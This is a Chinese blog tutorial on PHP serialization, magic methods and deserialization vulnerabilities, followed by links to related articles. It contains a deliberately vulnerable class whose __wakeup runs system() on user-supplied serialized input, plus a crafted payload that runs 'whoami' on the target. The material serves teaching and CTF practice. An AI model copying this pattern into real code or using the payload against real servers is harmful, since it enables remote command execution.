PHP反序列化

最新推荐文章于 2022-05-17 10:08:58 发布
最新推荐文章于 2022-05-17 10:08:58 发布
阅读量183 收藏 1
点赞数 1
分类专栏: PHP 文章标签: php 序列化 反序列化 web漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45924653/article/details/119811999
版权

所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
为了能够unserialize()一个对象,这个对象的类必须已经定义过。如果序列化类A的一个对象,将会返回一个跟类A相关,而且包含了对象所有变量值的字符串。 如果要想在另外一个文件中解序列化一个对象,这个对象的类必须在解序列化之前定义,可以通过包含一个定义该类的文件或使用函数spl_autoload_register()来实现。

序列化

serialize序列化

<?php
class man{
    public $name;
    public $age;
    public function info(){
        echo $this->name . $this->age . 'years old';
    }
}
$jack=new man();
$jack->name='martin';
$jack->age=21;
$jack->info();
echo '<br>';
echo serialize($jack);

?>

在这里插入图片描述
o:对象名 3:长度
s:字符串 4:属性名长度

反序列化

unserialize反序列化

<?php
class man{
    public $name;
    public $age;
    public function info(){
        echo $this->name . $this->age . 'years old <br>';
    }
}
$o=unserialize($_GET['p']);
$o->info();
?>

在这里插入图片描述
post方法相同

在这里插入图片描述

常用魔术方法

__construct,构造函数,PHP 5 允行开发者在一个类中定义一个方法作为构造函数。具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初 始化工作。
__toString,打印一个对象时,如果定义了__toString()方法,就能在测试时,通过echo 打印对象体,对象就会自动调用它所属类定义的toString方法,格式化输出这个对象所包含 的数据。
__destruct,析构函数,PHP 5 引入了析构函数的概念,这类似于其它面向对象的语言, 如 C++。析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。
__sleep magic方法在一个对象被序列化的时候调用。
__wakeup magic方法在一个对象被反序列化的时候调用。

<?php

class People{
    public $name;
    public $age;
    public function __construct()
    {
        echo 'hello <br>';
    }
    public function __destruct()
    {
        echo "destruct ! <br>";
    }
    public function __sleep()
    {
        echo "sleep!<br>";
    }
    public function __wakeup()
    {
        echo "wakeup<br>";
    }
    public function __toString()
    {
        echo "tostring<br>";
        return "must have return<br>";
    }
}


$martin = new People();
$martin = unserialize('O:6:"People":2:{s:4:"name";i:18;s:3:"age";N;}');
echo $martin;

在这里插入图片描述

反序列化漏洞

目标上有这样一个文件

<?php

class flag{
    public $cmd;
    public function __wakeup()
    {
        system($this -> cmd);
    }
}

unserialize($_POST['p']);
highlight_file(__FILE__);

unserialize函数是可控的,本地写序列化文件得到的字符串去打远端

<?php
class flag{
    public $cmd;
    public function __wakeup()
    {
        system($this -> cmd);
    }
}
$flag=new flag();
$flag->cmd='whoami';
echo serialize($flag);

在这里插入图片描述
在这里插入图片描述

c7ay.
关注
专栏目录
第二十二天php反序列化问题
代码审计
03-31 1915
序列化 百度百科上关于序列化的定义是, 将对象的状态信息转换为可以存储或传输的形式的过程。在序列化 期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对 象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安 全的进行通信。 PHP中的序列化反序列化 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一 旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没
反序列化__wakeup
yyj1781572的博客
12-06 311
反序列化__wakeup
XCTF-攻防世界CTF平台-Web类——10、unserialize3(反序列化漏洞绕过__wakeup()函数)
Onlyone_1314的博客
11-21 2473
打开题目地址: 发现是一段残缺的php代码 题目名称unserialize3就是反序列化,要求我们通过反序列化漏洞绕过__wakeup()函数。 相关概念: 序列化:   序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 php序列化反序列化   php序列化反序列化由serialize()和unserialize()这两个函数来完成。s
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6333
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
php反序列化例题.docx
最新发布
07-18
PHP 反序列化详解 PHP 反序列化是指将序列化的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列化反序列化的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 反序列化的过程...
详解php反序列化
10-15
PHP反序列化PHP编程中的一个重要概念,它涉及到将PHP变量从一种状态转换成另一种状态,即从内存中的表示形式转换成能够在文件或数据库中持久保存的格式,然后再将其还原回内存状态的过程。序列化操作可以通过PHP的...
渗透测试-PHP反序列化及绕过
cdyunaq的博客
04-26 4491
最简单的反序列化 require_once('flag.php'); highlight_file(__FILE__); classA{ private$user='test'; function__destruct(){ ...
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1324
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
php class
01-12 1435
1. class 构造 、析构、成员函数 基础 <?php class CTest{ const STD_TYPE = 1; public $name; public $age = 1; public function __construct($name ,$age) { //如果没有,会自动生成一个没有参数,没有动作的构造函数 $this->name = $name; $th
php initlize,PHP 反序列化漏洞入门学习笔记
weixin_34675606的博客
03-29 286
参考文章:序列化反序列化的概念序列化就是将 对象、string、数组array、变量 转换成具有一定格式的字符串。具体可以看 CTF PHP反序列化,下图摘自此篇文章其实每个字符对应的含义都很好理解:s ---- string 字符串i ---- integer 整数d --- 双精度型b ---- boolean 布尔数N ---- NULL...
通用反序列化
Vdieoo的博客
06-14 557
各种语言都有反序列化漏洞 序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象 也就是把数据转化为一种可逆的数据结构,再把这种可逆的数据结构转化回数据,这就是序列化反序列化 看到过一个通用的例子(可以应用到很多场景中,比如网络数据包传递接收过程之类的),买一个柜子,从北京运到上海,由于柜子形状怪异,不方便运输,先把它拆成板子,再装到箱子里,顺丰邮到买家手里,把板子拼装回柜子 ...
反序列化漏洞总结
dreamthe的博客
11-24 3431
1.了解序列化反序列化 在学习反序列化漏洞之前,需要了解什么是反序列化序列化,我看到了一个很好的比喻,觉得很适合帮助大家对于两者理解,相信大家都在淘宝买过东西,不知道有没有买过那种小型家具,我有买过鞋柜,商家发货的时候不会将一个完好的鞋柜寄给你,第一因为中途可能会损坏,第二呢就是增加包装成本。所以商家都会将鞋柜所有部件打包寄过来,顾客拿到快递在自己根据安装教程安装好鞋柜。那么这里面就有两个过程,一个是商家将所以部件打包发走,一个是你拿到安装还原。那么序列化就是商家打包过程,反序列化就是将商品还原过程。
ctf中的php序列化反序列化
qq_45414878的博客
11-08 1565
ctf中的php序列化反序列化 刚开始学的php序列化反序列化,有点雨里雾里的,于是做个笔记~~ 首先我们来了解一下概念知道他是怎么样的一个东西: 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 然后了解魔术方法: __construct: 在创建对象时候初始化对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完
魔术方法总结
梦里不知身是客
12-26 9863
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
深入理解PHP反序列化机制
"PHP 反序列化详解,包括serialize()函数的使用、序列化的概念和示例,以及PHP反序列化格式的解析。" 在PHP中,反序列化是一个至关重要的概念,它允许我们把之前通过序列化过程保存的字节流(通常是存储在文件或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值